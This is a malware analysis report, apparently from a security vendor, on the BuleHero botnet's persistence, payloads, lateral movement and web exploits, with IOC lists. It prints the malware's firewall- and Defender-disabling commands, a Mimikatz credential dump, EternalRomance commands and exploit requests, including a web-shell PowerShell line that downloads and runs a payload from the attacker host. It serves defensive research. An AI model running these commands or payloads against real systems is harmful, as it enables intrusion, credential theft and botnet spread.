Ever since the 2017 outbreak of WannaCry, NotPetya, and BadRabbit ransomware, as well as the WannaMine cryptocurrency campaign, there has been a steep increase in malware that uses the now infamous ShadowBroker’s leaked exploits—EternalBlue, EternalChampion, EternalRomance, and EternalSynergy—for lateral propagation.
Alongside these exploits, many other modules such as MimiKatz, PsExec, and WMIC have been observed as a means to propagate malware on networks. Traditional attack vectors like brute force attacks are also playing a crucial role in infecting other hosts to spread malware. The ThreatLabZ team is keeping a close eye on these and other new lateral movement techniques and the malware they are attempting to propagate. While doing research on this topic, we landed on a botnet called “BuleHero,” which has a number of lateral movement techniques embedded in it. In this report, we will provide a brief overview of the malware dropped by the BuleHero botnet, while focusing on the lateral movement aspect of BuleHero botnet.
BuleHero is named after the domain “bulehero[.]in,” which was found in the initial botnet binary. This botnet leverages a variety of web exploits to enable it to intrude on unpatched web servers. It also contains many other exploits to help it spread across the network. It not only tries to spread on internal networks but also on the internet. The Zscaler Cloud Sandbox service detected this malware.
URL: aa[.]0xbdairolkoie[.]space/xs.exe
MD5: F864506F9797592321CF4C6A0BB5F199
Let's take a deeper look into the different modules of this botnet.
The “xs.exe” is an installer file that downloads “swpuhostd.exe” from the URL “aa[.]0xbdairolkoie[.]space/swpuhostd.exe” and stores it at “C:\WebKitSdk\2.25.16\swpuhostd.exe” location.
It then fetches the configuration file (cfg.ini) from one of the nine hardcoded URLs.
hxxp://xs[.]0x0x0x0x0[.]club:63145/cfg[.]ini
hxxp://qb[.]1c1c1c1c[.]best:63145/cfg[.]ini
hxxp://ce[.]1c1c1c1c[.]club:63145/cfg[.]ini
hxxp://jz[.]1c1c1c1c[.]xyz:63145/cfg[.]ini
hxxp://eq[.]s1s1s1s1s[.]asia:63145/cfg[.]ini
hxxp://rs[.]s1s1s1s1s[.]fun:63145/cfg[.]ini
hxxp://ik[.]s1s1s1s1s[.]host:63145/cfg[.]ini
hxxp://cu[.]s1s1s1s1s[.]pw:63145/cfg[.]ini
hxxp://ff[.]s1s1s1s1s[.]site:63145/cfg[.]ini
Fig 1: BuleHero configuration
The botnet looks for new updates from the IPs 172.104.91.191 and 139.162.2.123. The URL “hxxp://fk[.]0xbdairolkoie[.]space/download.exe” is part of the payload or shellcode used to compromise other machines on the network. Upon successful exploitation, the file downloaded from this rule is executed on the infected system, which, in turn, tries to spread from that machine. The botnet contains an embedded miner file that connects to “mi.oops[.]best:80, mx.oops[.]best:443” mining pool.
On a successful run, it creates a copy of itself at the below location on the infected system.
C:\\Windows\\uhctnicb\\mftzlgg.exe
C:\\Windows\\Fonts\\mftzlgg.exe
%TEMP%\\388954562\\TemporaryFile
To be persistent on the system, the malware does the following:
Creates a service with name “bnttpgkqt” and with BinaryPathName as "C:\\Windows\\uhctnicb\\mftzlgg.exe"
Creates a task with the name “bicfnzlke,” which triggers the main malware file every minute with full permissionscmd /c echo Y|schtasks /create /sc minute /mo 1 /tn \"bicfnzlke\" /ru system /tr \"cmd /c C:\\Windows\\Fonts\\mftzlgg.exe\"
Makes a run entry with the name “bnttpgkqt” for “C:\Windows\uhctnicb\mftzlgg.exe” at “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”
It also tries to bypass the security measures on the system, like firewalls. The botnet first deletes all the firewall rules and later it adds a few in order to enable access to the NetBIOS and SMB protocol.
Below are the commands found in the binary that manipulates the firewall rules:
netsh ipsec static delete all
netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
netsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList
netsh ipsec static set policy name=Bastards assign=y
netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
netsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList
netsh ipsec static set policy name=Bastards assign=y
netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
netsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList
netsh ipsec static set policy name=Bastards assign=y
cmd /c net stop SharedAccess
cmd /c netsh firewall set opmode mode=disable
cmd /c netsh Advfirewall set allprofiles state off
cmd /c net stop MpsSvc
cmd /c net stop WinDefend
cmd /c net stop wuauserv
cmd /c sc config MpsSvc start= disabled
cmd /c sc config SharedAccess start= disabled
cmd /c sc config WinDefend start= disabled
cmd /c sc config wuauserv start= disabled
The malware also changes the below file associations in HKEY_CLASSES_ROOT to txtfile for the files with these extensions “.bat, .cmd, .js, .vbs, .vbe, .reg, .ps1.”
The botnet contains many embedded files in it. It drops those files in the following directory structure at “C:\Windows\ziheeghmq”:
Fig 2: Drop location
Corporate – Mimikatz password grabbing tool
qvrmuzmcf – Port scanning tools
UnattendGC – Eternal Blue attack kit
It drops XMRig miner at “%TEMP%\\cnaqzbggt\\svtink.exe” and it also drops a Gh0st RAT at “%systemroot%\\vqbbqs.exe.”
Payloads
XMRig Miner:
The XMRig miner uses a configuration file “%TEMP%\\cnaqzbggt\\config.json” dropped by the botnet.
Fig 3: XMRig miner configuration file
It’s compiled with open-source XMRig miner and uses “mi.oops[.]best:80” and “mx.oops[.]best:443” mining pool.
Fig 4: XMRig miner network communication
Gh0st RAT:
Gh0st RAT is an open-source RAT. The source code is public and it has been used by multiple groups. First, it creates a service of itself with the name “EaepRegSvc.” It creates a mutex of the name “ox.mygoodluck.best:12000:EaepRegSvc." It makes a DNS request for ox.mygoodluck[.]best to get the IP address, which is 185.147.34[.]106. This RAT communicates on 185.147.34[.]106:12000 to receive commands and send the data with encryption.
Fig 5: Gh0st RAT CNC traffic
Lateral movement
To this point, we have provided a few details about the embedded malware payloads dropped by the BuleHero botnet. Now we will shift our focus to the lateral movement modules, which are embedded in this botnet. Below are the modules that are used to perform lateral spreading.
Port Scanning
In order to spread across a network, it is important for malware to scan the network to identify the exposed and vulnerable machines connected to the network. To achieve this scan, “Swpuhostd.exe” drops a port scanning tool at the location “C:\\Windows\\ziheeghmq\\qvrmuzmcf\\vqfevffuz.exe.”
The botnet first fetches the public IP address of the infected system by accessing “hxxp://v4.ipv6-test[.]com/api/myip.php, from which it generates the IP subnet of the public network of the infected system and stores it into “C:\\Windows\\ziheeghmq\\qvrmuzmcf\\ip.txt.” It also adds intranet subnets and public subnets which are randomly generated by the botnet.
Fig 6: IP subnets in “ip.txt”
After creating the IP ranges, the botnet starts the port scanning module to scan IP addresses specified in the ip.txt with a given port. The botnet also generates ports that are given as input to the below command. It generates ports that belong to web applications. It also contains a few hard-coded ports like 135 (DCE/RPC), 139 (NetBIOS), 445 (SMB), and 3389 (RDP).
Scanning command struture:cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p
Example
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8020
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8040
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 7001
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 7070
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8050
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8282
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8082
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8085
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8087
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8088
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8983
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8060
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8080
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 9090
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8001
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8083
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8888
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 8181
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 135
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 445
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 80
cmd /c vqfevffuz.exe -iL ip.txt -oJ Result.txt --open --rate 4096 -p 88
In this version of BuleHero botnet, we also observed scanning for an RDP service. The botnet starts this scanning on a hard-coded IP subnet 222.186.55.1-222.186.155.255. It also scans port 80 on this subnet. It saves the IP addresses that have ports 80 and 3389 open to Scantest.txt. The port scanning happens sequentially and its results are accumulated into Result.txt. The results of the scanning process are the active IP addresses that have those ports opened up.
cmd /c vqfevffuz.exe -p 80,3389 222.186.55.1-222.186.155.255 --rate=1024 -oJ Scantest.txt
Interestingly, the botnet deletes the generated “Scantest.txt” file without using it. This suggests that the BuleHero botnet authors are trying to integrate RDP scanning, possibly enabling future exploits for RDP such as Bluekeep or attacking the RDP service with traditional brute-force attacks.
Fig 7: RDP scanning
Lateral movement components
Mimikatz
The botnet drops the “Mimikatz” tool at “C:\\Windows\\ziheeghmq\\Corporate\\vfshost.exe” for dumping passwords from infected hosts. These passwords are used to log into systems connected to the botnet.
cmd /c C:\\Windows\\ziheeghmq\\Corporate\\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\\Windows\\ziheeghmq\\Corporate\\log.txt
Fig 8: Running Mimikatz to extract credentials
These obtained passwords are then used by PsExec and WMIC to spread the malware onto the network.
PsExec and WMIC
The botnet drops the PsExec tool at the location “C:\\Windows\\ziheeghmq\\Corporate\\scvhost.exe” and it uses the WMIC tool, which is already present on Windows systems. The botnet first launches PsExec to execute the malware on a remote machine, but if it fails it then uses WMIC to execute the malware.
Along with Mimikatz input, the botnet contains a dictionary of usernames and passwords to carry out a brute-force attack on a remote machine.
PsExec command:scvhost.exe /accepteula \\[remote_machine] -d -c -u -p “cmd.exe /c [command]”
Fig 9: Remote execution using PsExec
WMIC command:wmic.exe /node:[targetMachine] /user:[userName] /password:[password] process call create “cmd.exe /c [command]”
Fig 10: Remote execution using WMIC
SMB Exploitation
The botnet stores the ShadowBroker’s NSA leaked Fuzzbunch like the SMB exploitation toolkit at the directory “C:\\Windows\\ziheeghmq\\UnattendGC.” The toolkit contains EternalBlue, EternalRomance, EternalChampion exploits, backdoor DoublePulsar, and the SMBtouch utility.
Fig 11: SMB exploits package
The botnet reads the scanning result of the port scanner tool after running it against ports 139 and 445, which is present at “C:\\Windows\\ziheeghmq\\qvrmuzmcf\\Result.txt.” The botnet runs the SMBtouch utility to scan for vulnerable hosts.
SMB touch command:vimpcsvc.exe --InConfig vimpcsvc.xml --TargetIp 106.51.178.148 --TargetPort 445 --NetworkTimeout 60 --Protocol SMB --OutConfig 106.51.178.148.xml
It then launches SMB exploits onto the vulnerable machine with shellcode, which injects the final payload (AppCapture32.dll or AppCapture64.dll) into one of the legitimate processes of the target machine. Below is one such example in which we observed that EternalRomance was being used to exploit the system.
Eternal Romance and Double Pulsar commandcmd /c docmicfg.exe --InConfig docmicfg.xml --TargetIp 106.51.3.141 --TargetPort 445 --NetworkTimeout 30 --Protocol SMB --Target WIN7_SP1 --TargetOsArchitecture x86 --Credentials Anonymous --PipeName samr --ShellcodeFile Shellcode.ini & svschost.exe --InConfig svschost.xml --TargetIp 106.51.3.141 --TargetPort 445 --DllPayload AppCapture32.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll
The payload DLL downloads the BuleHero malware from “hxxp://fk.0xbdairolkoie[.]website/download.exe” and stores it at “C:\\WebKit\\2.250.20\\fxxkmylife0xa.exe” before executing it.
Fig 12: Payload after SMB exploitation
Along with the SMB exploits, the botnet contains exploits for well-known web applications. These exploits are fired against web servers obtained from the post scanning result.
Web Application Exploits
Apache Tomcat PUTs vulnerability (CVE-2017-12615)
This vulnerability affects Apache Tomcat 7.0.0 to 7.0.79 on Windows with the HTTP PUTs method enabled. It uploads a maliciously crafted JSP file to the server.
Fig 13: Crafting request after uploading FxCodeShell.jsp
Exploit::/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http%3A%2F%2Ffk.0xbdairolkoie.space%2Fdownload.exe
Apache Struts RCE vulnerability (CVE-2017-5638)
This vulnerability affects Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1. Apache Struts is a free and open-source framework used to build Java web applications. This particular vulnerability can be exploited if the attacker sends a crafted request to upload a file to a vulnerable server that uses a Jakarta-based plugin to process the upload request. The attacker can then send malicious code in the "Content-Type" header to execute the command on a vulnerable server.
Fig 14: Crafting request to exploit Apache Struts vulnerability
Exploit::/struts2-rest-showcase/orders.xhtml
Content-Type: %{(#nike='multipart/form-data')... Post.Open "GET","hxxp://fk.0xbdairolkoie[.]website/download.exe",0 >>..
Oracle WebLogic server vulnerability (CVE-2018-2628)
This vulnerability allows an unauthenticated attacker with network access via the T3 protocol to compromise an Oracle WebLogic Server running on port 7001. The affected versions are 10.3.6.0, 12.1.3.0, 12.2.1.2, and 12.2.1.3
Fig 15: sending T3 handshaking request
Fig 16: sending payload to execute on server
WebLogic Deserialization RCE vulnerability (CVE-2019-2725)
Oracle WebLogic Server is prone to a remote command-execution vulnerability due to deserializing input information. Specifically, this issue affects the "wls9_async" and "wls-wsat" components. An attacker can exploit this issue to execute arbitrary commands. The affected versions are 10.3.6.0.0 and 12.1.3.0.0.
Fig 17: Constructing malicious payload request
Exploit::port/wls-wsat/CoordinatorPortType OR
:port/_async/AsyncResponseService
Data: payload
Oracle WebLogic Server vulnerability (CVE-2017-10271)
This vulnerability in the Oracle WebLogic Server component of WLS security allows an unauthenticated attacker with network access via the T3 protocol to compromise the server. The affected versions are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, and 12.2.1.2.0.
Fig 18: Constructing malicious payload request
ThinkPHP v5 Remote Code Execution vulnerability
The reason for this vulnerability is that the underlying layer of the ThinkPHP5 framework does not strictly filter the controller name, which allows an attacker to call sensitive functions inside the ThinkPHP framework through the URL, which leads to the download and installation malware.
It tries to download and execute malware by running PowerShell from "cmd" due to this vulnerability.
Fig 19: ThinkPHP vulnerability to download and execute malware
It tries to install hydra.php due to this vulnerability, and installs a web-shell that executes commands.
Fig 20: ThinkPHP vulnerability to install malware by web-shell
It also installs hydra.php to launch PowerShell from "cmd," and downloads and execute the malware.
Fig 21: ThinkPHP vulnerability to download and execute malware by hydra.php
Exploit:GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%http://20System.Net.WebClient).DownloadFile('http://fk.0xbdairolkoie[.]website/download.exe','C:/WebKit/2.250.20/12.exe');start%20C:/WebKit/2.250.20/12.exe
Drupal Remote Code Execution vulnerability (CVE-2018-7600)
A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised. It allows an attacker to inject a malicious payload into a form structure to execute arbitrary code.
Fig 22: Construct a request payload to exploit Drupal vulnerability
Exploit:URL : /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax
Payload: form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=system&mail[#type]=markup&mail[#markup]= “malicious commands”
Apache Solr Remote Code Execution vulnerability (CVE-2019-0193)
This vulnerability exists in the DataImportHandler module, a common module used to import data from databases or other sources. The whole DIH configuration of this module can come from the dataConfig parameter included in an external request. As a DIH configuration can contain scripts, this parameter is a security risk.
An attacker could exploit this vulnerability to cause arbitrary code execution via a malicious request that contains a carefully crafted dataConfig parameter. Affected versions: Apache Solr
PHPStudy backdoor
The BuleHero malware checks the below PHP module paths if it exists, then it replaces that module with the embedded backdoor, which allows an attacker to execute any command on the server.
PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll
PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll
This module is the same as those that were being spread by the PhpStudy official site when it was compromised. The purpose of these implanted backdoors was mainly for the remote code execution.
Fig 24: Drop php_xmlrpc.dll if already exists
Other than making the infected system vulnerable, this malware targets the scanned IPs to download and execute the payload.
Fig 25: Crafting a request with malicious payload
Exploit:URL: /index.php
Accept-Encoding: gzip,deflate
Accept-Charset:
Conclusion
Inclusion of lateral propagation in any type of malware makes it more dangerous, as it can compromise an entire network. By including several exploits and methods for spreading across the network, the malware has multiple options which makes it more robust. We have been observing an increase in such malware since 2017. We advise users to keep systems updated with the latest operating system updates and security patches and to harden servers and endpoints. It's also important to update software security regularly to defend against such malware. Zscaler provides a layered security offering which protects against new and evolving malware, like the BuleHero botnet. The inclusion of Cloud IPS in the Zscaler platform protects customers against the exploits used in lateral propagation.
Zscaler protection
Fig 26: Zscaler Sandbox report
IOCs:
URLs:
aa[.]0xbdairolkoie[.]space/xs.exe
aa[.]0xbdairolkoie[.]space/swpuhostd.exe
fk[.]0xbdairolkoie[.]space/download.exe
xs[.]0x0x0x0x0[.]club:63145/cfg[.]ini
qb[.]1c1c1c1c[.]best:63145/cfg[.]ini
ce[.]1c1c1c1c[.]club:63145/cfg[.]ini
jz[.]1c1c1c1c[.]xyz:63145/cfg[.]ini
eq[.]s1s1s1s1s[.]asia:63145/cfg[.]ini
rs[.]s1s1s1s1s[.]fun:63145/cfg[.]ini
ik[.]s1s1s1s1s[.]host:63145/cfg[.]ini
cu[.]s1s1s1s1s[.]pw:63145/cfg[.]ini
ff[.]s1s1s1s1s[.]site:63145/cfg[.]ini
aa[.]openyourass[.]icu/xs[.]exe
fk[.]openyourass[.]icu/securitydnsservice[.]exe
fk[.]openyourass[.]icu/download[.]exe
ae86[.]decode0x[.]fun:63145/cfg[.]ini
ae86[.]decode0x[.]host:63145/cfg[.]ini
ae86[.]decode0x[.]icu:63145/cfg[.]ini
ae86[.]decode0x[.]online:63145/cfg[.]ini
ae86[.]decode0x[.]pw:63145/cfg[.]ini
ae86[.]decode0x[.]site:63145/cfg[.]ini
s4f5er4t5g1df23saadse[.]club:63145/cfg[.]ini
ox[.]mygoodluck[.]best
mi.oops[.]best:80
mx.oops[.]best:443
IPs:
172[.]104[.]91[.]191
139[.]162[.]2[.]123
185[.]147[.]34[.]106
185[.]147[.]34[.]136
Hashes:
F864506F9797592321CF4C6A0BB5F199 (xs.exe)
ECB3266326D77741815ECEBB18EE951A (swpuhostd.exe)
1B20076D8470AA308E24A2098786ECDD (svtink.exe)
398FB3FED9BE2941F3548A5D0D4B862C (vqbbqs.exe)
EA774C81FE7B5D9708CAA278CF3F3C68 (vqfevffuz.exe)
1F2E820A81AE38E9E8DC173975AB57A6 (vfshost.exe)
F89544ECBF66E93C2821625861AE8821 (AppCapture32.dll)
B1956FE89E3D032BE3A06820C63F95A6 (AppCapture64.dll)
FB82BA8BB7A402B05D06436991B10321 (ShellCode.ini)
D464F1D389593B6DC285E64BC8B211AC (docmicfg.exe)
6612282F37F7CBDD2A962577FA49EF66 (schoedcl.exe)
22BB1452CA9BC4B8D346368D3F4DB6C2 (spoolsrv.exe)
E4FF1EF997A3A1419F22938F83C91E45 (svschost.exe)
48442048EE3AB045FCB08809597E03B4 (vimpcsvc.exe)
BD5AF8E9AFEA8D8173854F0A0C038B68 (SecurityDnsService.exe)
982C401A9D6F7016D910E8E60F17A0FB (AppCapture32.dll)
6E7E98549BAA186D3A0E3D1840B05ABF (AppCapture64.dll)
↧